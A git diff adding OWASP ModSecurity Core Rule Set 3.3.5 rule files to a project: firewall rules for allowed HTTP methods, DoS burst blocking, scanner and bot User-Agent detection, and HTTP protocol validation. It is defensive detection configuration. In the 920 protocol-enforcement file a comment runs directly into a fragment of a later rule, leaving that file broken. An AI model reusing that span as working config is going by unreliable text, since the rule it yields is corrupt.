+# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910017,phase:1,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:910018,phase:2,pass,nolog,skipAfter:END-REQUEST-910-IP-REPUTATION"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-910-IP-REPUTATION"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
new file mode 100644
index 000000000..840fe2be5
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-911-METHOD-ENFORCEMENT.conf
@@ -0,0 +1,76 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911011,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:911012,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ Allowed Request Methods ]=-
+#
+# tx.allowed_methods is defined in the crs-setup.conf file
+#
+SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" \
+ "id:911100,\
+ phase:2,\
+ block,\
+ msg:'Method is not allowed by policy',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-generic',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272/220/274',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911013,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:911014,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" 
"id:911015,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:911016,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911017,phase:1,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:911018,phase:2,pass,nolog,skipAfter:END-REQUEST-911-METHOD-ENFORCEMENT"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-911-METHOD-ENFORCEMENT"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-912-DOS-PROTECTION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-912-DOS-PROTECTION.conf
new file mode 100644
index 000000000..46767c163
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-912-DOS-PROTECTION.conf
@@ -0,0 +1,324 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# Anti-Automation rules to detect Denial of Service attacks.
+#
+# Description of mechanics:
+# When a request hits a non-static resource (TX:STATIC_EXTENSIONS), then a counter for the IP
+# address is being raised (IP:DOS_COUNTER). If the counter (IP:DOS_COUNTER) hits a limit
+# (TX:DOS_COUNTER_THRESHOLD), then a burst is identified (IP:DOS_BURST_COUNTER) and the
+# counter (IP:DOS_COUNTER) is reset. The burst counter expires within a timeout period
+# (TX:DOS_BURST_TIME_SLICE).
+# If the burst counter (IP:DOS_BURST_COUNTER) is greater equal 2, then the blocking flag
+# is being set (IP:DOS_BLOCK). The blocking flag (IP:DOS_BLOCK) expires within a timeout
+# period (TX:DOS_BLOCK_TIMEOUT). All this counting happens in phase 5.
+# There is a stricter sibling to this rule (912170) in paranoia level 2, where the
+# burst counter check (IP:DOS_BURST_COUNTER) hits at greater equal 1.
+#
+# The blocking is done in phase 1: When the blocking flag is encountered (IP:DOS_BLOCK),
+# then the request is dropped without sending a response. If this happens, then a
+# counter is # raised (IP:DOS_BLOCK_COUNTER).
+# When an IP address is blocked for the first time, then the blocking is reported in a
+# message and a flag (IP:DOS_BLOCK_FLAG) is set. This flag expires in 60 seconds.
+# When an IP address is blocked and the flag (IP:DOS_BLOCK_FLAG) is set, then the
+# blocking is not being reported (to prevent a flood of alerts).
When the flag
+# (IP:DOS_BLOCK_FLAG) has expired and a new request is being blocked, then the
+# counter (IP:DOS_BLOCK_COUNTER) is being reset to 0 and the block is being treated
+# as the first block (-> alert).
+# In order to be able to display the counter (IP:DOS_BLOCK_COUNTER) and resetting
+# it at the same time, we copy the counter (IP:DOS_BLOCK_COUNTER) into a different
+# variable (TX:DOS_BLOCK_COUNTER), which is then displayed in turn.
+#
+# Variables:
+# IP:DOS_BLOCK Flag if an IP address should be blocked
+# IP:DOS_BLOCK_COUNTER Counter of blocked requests
+# IP:DOS_BLOCK_FLAG Flag keeping track of alert. Flag expires after 60 seconds.
+# IP:DOS_BURST_COUNTER Burst counter
+# IP:DOS_COUNTER Request counter (static resources are ignored)
+# TX:DOS_BLOCK_COUNTER Copy of IP:DOS_BLOCK_COUNTER (needed for display reasons)
+# TX:DOS_BLOCK_TIMEOUT Period in seconds a blocked IP will be blocked
+# TX:DOS_COUNTER_THRESHOLD Limit of requests, where a burst is identified
+# TX:DOS_BURST_TIME_SLICE Period in seconds when we will forget a burst
+# TX:STATIC_EXTENSIONS Paths which can be ignored with regards to DoS
+#
+# As a precondition for these rules, please set the following three variables:
+# - TX:DOS_BLOCK_TIMEOUT
+# - TX:DOS_COUNTER_THRESHOLD
+# - TX:DOS_BURST_TIME_SLICE
+#
+# And make sure that TX:STATIC_EXTENSIONS is also set.
+#
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+#
+# Skip if variables defining DoS protection are not set
+#
+SecRule &TX:dos_burst_time_slice "@eq 0" \
+ "id:912100,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain,\
+ skipAfter:END-DOS-PROTECTION-CHECKS"
+ SecRule &TX:dos_counter_threshold "@eq 0" \
+ "chain"
+ SecRule &TX:dos_block_timeout "@eq 0"
+
+SecRule &TX:dos_burst_time_slice "@eq 0" \
+ "id:912110,\
+ phase:5,\
+ pass,\
+ t:none,\
+ nolog,\
+ ver:'OWASP_CRS/3.3.5',\
+ chain,\
+ skipAfter:END-DOS-PROTECTION-CHECKS"
+ SecRule &TX:dos_counter_threshold "@eq 0" \
+ "chain"
+ SecRule &TX:dos_block_timeout "@eq 0"
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912011,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:912012,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ Anti-Automation / DoS Protection : Block ]=-
+#
+
+#
+# Block and track # of requests and log
+#
+SecRule IP:DOS_BLOCK "@eq 1" \
+ "id:912120,\
+ phase:1,\
+ drop,\
+ msg:'Denial of Service (DoS) attack identified from %{tx.real_ip} (%{tx.dos_block_counter} hits since last alert)',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'paranoia-level/1',\
+ tag:'attack-dos',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/227/469',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule &IP:DOS_BLOCK_FLAG "@eq 0" \
+ "setvar:'ip.dos_block_counter=+1',\
+ setvar:'ip.dos_block_flag=1',\
+ setvar:'tx.dos_block_counter=%{ip.dos_block_counter}',\
+ setvar:'ip.dos_block_counter=0',\
+ expirevar:'ip.dos_block_flag=60'"
+
+
+#
+# Block and track # of requests but don't log
+#
+SecRule IP:DOS_BLOCK "@eq 1" \
+ "id:912130,\
+ phase:1,\
+ drop,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ 
tag:'platform-multi',\
+ tag:'attack-dos',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/227/469',\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'ip.dos_block_counter=+1'"
+
+
+#
+# -=[ Anti-Automation / DoS Protection: Count requests ]=-
+#
+
+#
+# Skip if we have blocked the request
+#
+SecRule IP:DOS_BLOCK "@eq 1" \
+ "id:912140,\
+ phase:5,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-dos',\
+ ver:'OWASP_CRS/3.3.5',\
+ skipAfter:END-DOS-PROTECTION-CHECKS"
+
+
+#
+# DOS Counter: Count the number of requests to non-static resources
+#
+SecRule REQUEST_BASENAME "@rx .*?(\.[a-z0-9]{1,10})?$" \
+ "id:912150,\
+ phase:5,\
+ pass,\
+ capture,\
+ t:none,t:lowercase,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-dos',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/227/469',\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'tx.extension=/%{TX.1}/',\
+ chain"
+ SecRule TX:EXTENSION "!@within %{tx.static_extensions}" \
+ "setvar:'ip.dos_counter=+1'"
+
+
+#
+# Check DOS Counter
+# If the request count is greater than or equal to user settings,
+# we raise the burst counter. This happens via two separate rules:
+# - 912160: raise from 0 to 1
+# - 912161: raise from 1 to 2
+#
+# This approach with two rules avoids raising the burst counter
+# from 0 to 2 via two concurrent requests. We do not raise the
+# burst counter beyond 2.
+#
+#
+SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
+ "id:912160,\
+ phase:5,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-dos',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/227/469',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule &IP:DOS_BURST_COUNTER "@eq 0" \
+ "setvar:'ip.dos_burst_counter=1',\
+ setvar:'!ip.dos_counter',\
+ expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'"
+
+
+SecRule IP:DOS_COUNTER "@ge %{tx.dos_counter_threshold}" \
+ "id:912161,\
+ phase:5,\
+ pass,\
+ t:none,\
+ nolog,\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-dos',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/227/469',\
+ ver:'OWASP_CRS/3.3.5',\
+ chain"
+ SecRule &IP:DOS_BURST_COUNTER "@ge 1" \
+ "setvar:'ip.dos_burst_counter=2',\
+ setvar:'!ip.dos_counter',\
+ expirevar:'ip.dos_burst_counter=%{tx.dos_burst_time_slice}'"
+
+
+#
+# Check DOS Burst Counter and set Block
+# Check the burst counter - if greater than or equal to 2, then we set the IP
+# block variable for a given expiry and issue an alert.
+#
+SecRule IP:DOS_BURST_COUNTER "@ge 2" \
+ "id:912170,\
+ phase:5,\
+ pass,\
+ t:none,\
+ log,\
+ msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'paranoia-level/1',\
+ tag:'attack-dos',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/227/469',\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'ip.dos_block=1',\
+ expirevar:'ip.dos_block=%{tx.dos_block_timeout}'"
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912013,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912014,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:912019,phase:5,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+#
+# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
+#
+
+#
+# Check DOS Burst Counter and set Block
+# Check the burst counter - if greater than or equal to 1, then we set the IP
+# block variable for a given expiry and issue an alert.
+#
+# This is a stricter sibling of rule 912170.
+#
+SecRule IP:DOS_BURST_COUNTER "@ge 1" \
+ "id:912171,\
+ phase:5,\
+ pass,\
+ t:none,\
+ log,\
+ msg:'Potential Denial of Service (DoS) Attack from %{tx.real_ip} - # of Request Bursts: %{ip.dos_burst_counter}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-dos',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/227/469',\
+ ver:'OWASP_CRS/3.3.5',\
+ setvar:'ip.dos_block=1',\
+ expirevar:'ip.dos_block=%{tx.dos_block_timeout}'"
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912015,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:912016,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+#
+# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912017,phase:1,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:912018,phase:2,pass,nolog,skipAfter:END-REQUEST-912-DOS-PROTECTION"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-912-DOS-PROTECTION"
+
+SecMarker "END-DOS-PROTECTION-CHECKS"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-913-SCANNER-DETECTION.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-913-SCANNER-DETECTION.conf
new file mode 100644
index 000000000..6e12d0866
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-913-SCANNER-DETECTION.conf
@@ -0,0 +1,199 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913011,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:913012,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# -=[ Vulnerability Scanner Checks ]=-
+#
+# These rules inspect the default User-Agent and Header values sent by
+# various commercial and open source vuln scanners.
+# +# The following rules contain User-Agent lists: +# 913100 - security scanners (data file scanners-user-agents.data) +# 913101 - scripting/generic HTTP clients (data file scripting-user-agents.data) +# 913102 - web crawlers/bots (data file crawlers-user-agents.data) +# +SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scanners-user-agents.data" \ + "id:913100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found User-Agent associated with security scanner',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scanner',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + +SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@pmFromFile scanners-headers.data" \ + "id:913110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found request header associated with security scanner',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scanner',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + + +SecRule REQUEST_FILENAME|ARGS "@pmFromFile scanners-urls.data" \ + "id:913120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Found request 
filename/argument associated with security scanner',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-reputation-scanner',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/118/224/541/310',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'ip.reput_block_flag=1',\ + setvar:'ip.reput_block_reason=%{rule.msg}',\ + expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913013,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:913014,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + + +# +# -=[ Scripting/Generic User-Agents ]=- +# +# This rule detects user-agents associated with various HTTP client libraries +# and scripting languages. Detection suggests attempted access by some +# automated tool. +# +# This rule is a sibling of rule 913100. 
+#
+SecRule REQUEST_HEADERS:User-Agent "@pmFromFile scripting-user-agents.data" \
+ "id:913101,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Found User-Agent associated with scripting/generic HTTP client',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-scripting',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/118/224/541/310',\
+ tag:'PCI/6.5.10',\
+ tag:'paranoia-level/2',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
+ setvar:'ip.reput_block_flag=1',\
+ setvar:'ip.reput_block_reason=%{rule.msg}',\
+ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
+
+
+
+#
+# -=[ Crawler User-Agents ]=-
+#
+# This rule detects user-agents associated with various crawlers, SEO tools,
+# and bots, which have been reported to potentially misbehave.
+# These crawlers can have legitimate uses when used with authorization.
+#
+# This rule is a sibling of rule 913100.
+#
+SecRule REQUEST_HEADERS:User-Agent "@pmFromFile crawlers-user-agents.data" \
+ "id:913102,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,\
+ msg:'Found User-Agent associated with web crawler/bot',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-reputation-crawler',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/118/224/541/310',\
+ tag:'PCI/6.5.10',\
+ tag:'paranoia-level/2',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
+ setvar:'ip.reput_block_flag=1',\
+ setvar:'ip.reput_block_reason=%{rule.msg}',\
+ expirevar:'ip.reput_block_flag=%{tx.reput_block_duration}'"
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913015,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:913016,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+#
+# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913017,phase:1,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:913018,phase:2,pass,nolog,skipAfter:END-REQUEST-913-SCANNER-DETECTION"
+#
+# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
+#
+
+
+
+#
+# -= Paranoia Levels Finished =-
+#
+SecMarker "END-REQUEST-913-SCANNER-DETECTION"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
new file mode 100644
index 000000000..7f3138797
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf
@@ -0,0 +1,1685 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# Some protocol violations are common in application layer attacks.
+# Validating HTTP requests eliminates a large number of application layer attacks.
+#
+# The purpose of this rules file is to enforce HTTP RFC requirements that state how
+# the client is supposed to interact with the server.
+# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html
+
+
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+#
+# Validate request line against the format specified in the HTTP RFC
+#
+# -=[ Rule Logic ]=-
+#
+# Uses rule negation against the regex for positive security. The regex specifies the proper
+# construction of URI request lines such as:
+#
+# "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
+#
+# It also outlines proper construction for CONNECT, OPTIONS and GET requests.
+#
+# -=[ References ]=-
+# https://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.2.1
+# http://capec.mitre.org/data/definitions/272.html
+#
+SecRule REQUEST_LINE "!@rx ^(?i:(?:[a-z]{3,10}\s+(?:\w{3,7}?://[\w\-\./]*(?::\d+)?)?/[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?|connect (?:\d{1,3}\.){3}\d{1,3}\.?(?::\d+)?|options \*)\s+[\w\./]+|get /[^?#]*(?:\?[^#\s]*)?(?:#[\S]*)?)$" \
+ "id:920100,\
+ phase:2,\
+ block,\
+ t:none,\
+ msg:'Invalid HTTP Request Line',\
+ logdata:'%{request_line}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/210/272',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'WARNING',\
+ setvar:'tx.anomaly_score_pl1=+%{tx.warning_anomaly_score}'"
+
+
+#
+# Identify multipart/form-data name evasion attempts
+#
+# There are possible impedance mismatches between how
+# ModSecurity interprets multipart file names and how
+# a destination app server such as PHP might parse the
+# Content-Disposition data:
+#
+# filename-parm := "filename" "=" value
+#
+# -=[ Rule Logic ]=-
+# These rules check for the existence of the ' " ; = meta-characters in
+# either the file or file name variables.
+# HTML entities may lead to false positives, why they are allowed on PL1.
+# Negative look behind assertions allow frequently used entities &_; +# +# -=[ Targets, characters and html entities ]=- +# +# 920120: PL1 : FILES_NAMES, FILES +# ['\";=] but allowed: +# &[aAoOuUyY]uml); &[aAeEiIoOuU]circ; &[eEiIoOuUyY]acute; +# &[aAeEiIoOuU]grave; &[cC]cedil; &[aAnNoO]tilde; & ' +# +# 920121: PL2 : FILES_NAMES, FILES +# ['\";=] : ' " ; = meta-characters +# +# Not supported by re2 (?@-]+)*$" \ + "id:920470,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Content-Type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# In case Content-Type header can be parsed, check the mime-type against +# the policy defined in the 'allowed_request_content_type' variable. +# To change your policy, edit crs-setup.conf and activate rule 900220. 
+SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \
+ "id:920420,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,\
+ msg:'Request content type is not allowed by policy',\
+ logdata:'%{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-protocol',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/255/153',\
+ tag:'PCI/12.1',\
+ ver:'OWASP_CRS/3.3.5',\
+ severity:'CRITICAL',\
+ setvar:'tx.content_type=|%{tx.0}|',\
+ chain"
+ SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \
+ "t:lowercase,\
+ setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+
